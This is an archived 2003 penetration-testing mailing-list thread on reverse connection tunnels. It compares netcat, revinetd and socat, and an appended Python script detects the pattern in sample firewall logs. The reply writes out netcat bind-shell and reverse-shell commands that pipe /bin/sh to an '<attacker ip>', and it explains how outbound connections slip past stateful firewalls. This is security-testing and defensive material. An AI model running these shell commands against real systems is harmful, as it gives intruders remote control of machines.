Penetration Testing mailing list archives

RE: command-line reverse connection tunnel?


From: "Steven Gill" <gman1120 () hotmail com>
Date: Sun, 16 Mar 2003 22:26:33 -0500

Yes, you can use netcat to send a shell back, but it is a pain to use it for port redirection. E.g. for a shell you can:

nc -l -p <port> -e /bin/sh

or

nc <attacker ip> 1234 | /bin/sh | nc <attacker ip> 1235

and have stdin and stdout connected to the above ports respectively. But we want to use more robust services other than shell, such as getting GUI on Windows via terminal services or other more complex protocols.

Let's take for example a service on a machine that is not NAT'd but a border server we can compromise has access to it.

You can use rinetd, fpipe, stunnel, etc. for forward redirection. In these cases, there need to be 2 holes punched through on the server, 1 for the shell used to compromise the server (like www or telnet) and then the port for the redirector to listen on. Revinetd is used for port redirection where the server appears to be the initiator of the connectivity. You theoretically only need one port open in the forward direction, which is the shell. All other connectivity is initiated outbound from the server, so a stateful firewall would see the port redirector traffic as NEW in the connection table from the server, allowing us to utilize more liberal rule sets that we know most organizations allow.

Now I know revinetd is not the only thing to use for it. It was brought to my attention that socat can be used for this, but I wanted a tool that was just used for reverse port forwarding and was intuitive to use.

I hope this answers your question.

Steve

From: "Filip Maertens" <filip () securax be>
To: "'Steven Gill'" <gman1120 () hotmail com>,<pen-test () securityfocus com>
Subject: RE: command-line reverse connection tunnel?
Date: Sat, 15 Mar 2003 23:57:32 +0100

> have successfully tested it in a pen test situation in the lab for doing
> reverse connectivity.  I think this would be a valuable tool for all people

I beg to differ.

What exactly is different from using netcat listeners on both the
attack client and the target machine?  All in all, using a reverse telnet
technique with netcat isn't very much of a big issue?  I think this is
a handy tool, but I would like to emphasize one can also use netcat in
doing so (if this has been mentioned before in the "old posts",
disregard this post, since I didn't follow this thread).


Fil

--
Filip Maertens @ Home
http://www.compsec.be
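The reverse-connection setup Steve describes in his reply above (one inbound hole for the shell, everything else initiated outbound from the compromised server) leaves a trace a defender can look for: a server in a protected segment opening NEW outbound connections, outside its egress policy, to the very host that already holds an inbound session to it. The Python script below is an added example for this archive page, not code from the thread, revinetd or netcat; the log format, the addresses and ports, and the egress policy are constructed assumptions for illustration.

```python
"""Flag the reverse-tunnel pattern from the thread in connection-tracking
events: a server initiates NEW outbound flows, off-policy, back to a host
that already has an inbound session to it.

Added example for this archive page (not from the thread, revinetd or
netcat). Log format, hosts, ports and policy are constructed assumptions.
"""
import ipaddress
import re
from collections import defaultdict

# Constructed, simplified connection-tracking events (not real firewall logs).
# Direction is relative to the protected server segment; state is the
# stateful firewall's view of the flow.
SAMPLE_LOG = """\
2003-03-16T22:00:01 IN  NEW src=203.0.113.7:51020 dst=192.0.2.10:80
2003-03-16T22:00:05 OUT NEW src=192.0.2.10:40001 dst=198.51.100.5:53
2003-03-16T22:00:09 OUT NEW src=192.0.2.10:40002 dst=203.0.113.7:1234
2003-03-16T22:00:09 OUT NEW src=192.0.2.10:40003 dst=203.0.113.7:1235
2003-03-16T22:00:20 OUT NEW src=192.0.2.10:40004 dst=198.51.100.5:123
2003-03-16T22:00:21 OUT ESTABLISHED src=192.0.2.10:40004 dst=198.51.100.5:123
2003-03-16T22:01:00 OUT NEW src=192.0.2.11:40010 dst=203.0.113.9:3389
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<dir>IN|OUT)\s+(?P<state>\w+)\s+"
    r"src=(?P<src>[\d.]+):(?P<sport>\d+)\s+dst=(?P<dst>[\d.]+):(?P<dport>\d+)$"
)

# Hypothetical egress policy for the server segment: servers may initiate
# only DNS and NTP outbound; anything else a server starts is suspect.
PROTECTED_NET = ipaddress.ip_network("192.0.2.0/24")
ALLOWED_EGRESS_PORTS = {53, 123}


def parse_events(text):
    """Parse the constructed log format into dicts; non-matching lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m is None:
            continue
        ev = m.groupdict()
        ev["sport"] = int(ev["sport"])
        ev["dport"] = int(ev["dport"])
        events.append(ev)
    return events


def is_protected(ip):
    return ipaddress.ip_address(ip) in PROTECTED_NET


def find_reverse_tunnel_candidates(events):
    """Flag NEW outbound flows a protected server initiates to a non-approved port.

    Severity is 'high' when the destination already has an inbound session to
    that same server: that is the shape of the setup in the thread (one inbound
    hole for the shell, the redirector's flows all opened outbound to the same
    peer), and 'medium' for any other off-policy server-initiated egress.
    """
    inbound_peers = defaultdict(set)  # server -> external hosts seen inbound
    findings = []
    for ev in events:  # assumed to be in timestamp order
        if ev["state"] != "NEW":
            continue
        if ev["dir"] == "IN" and is_protected(ev["dst"]):
            inbound_peers[ev["dst"]].add(ev["src"])
        elif ev["dir"] == "OUT" and is_protected(ev["src"]):
            if ev["dport"] in ALLOWED_EGRESS_PORTS:
                continue
            returns_to_peer = ev["dst"] in inbound_peers[ev["src"]]
            findings.append({
                "ts": ev["ts"],
                "server": ev["src"],
                "peer": ev["dst"],
                "dport": ev["dport"],
                "severity": "high" if returns_to_peer else "medium",
                "reason": ("server connected back to a host holding an inbound session"
                           if returns_to_peer else
                           "server-initiated egress outside policy"),
            })
    return findings


def summarize(findings):
    """Count findings per severity for a quick triage view."""
    counts = {"high": 0, "medium": 0}
    for f in findings:
        counts[f["severity"]] += 1
    return counts


if __name__ == "__main__":
    for f in find_reverse_tunnel_candidates(parse_events(SAMPLE_LOG)):
        print(f"{f['ts']} {f['severity']:6} {f['server']} -> "
              f"{f['peer']}:{f['dport']}  {f['reason']}")
```

The allowlist is the real control here: the liberal outbound rule sets the thread says most organizations allow are exactly what the redirector relies on, and a default-deny egress policy on server segments removes that; the inbound/outbound correlation only catches the tunnel after it has been set up, so it belongs in monitoring, not in place of egress filtering.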







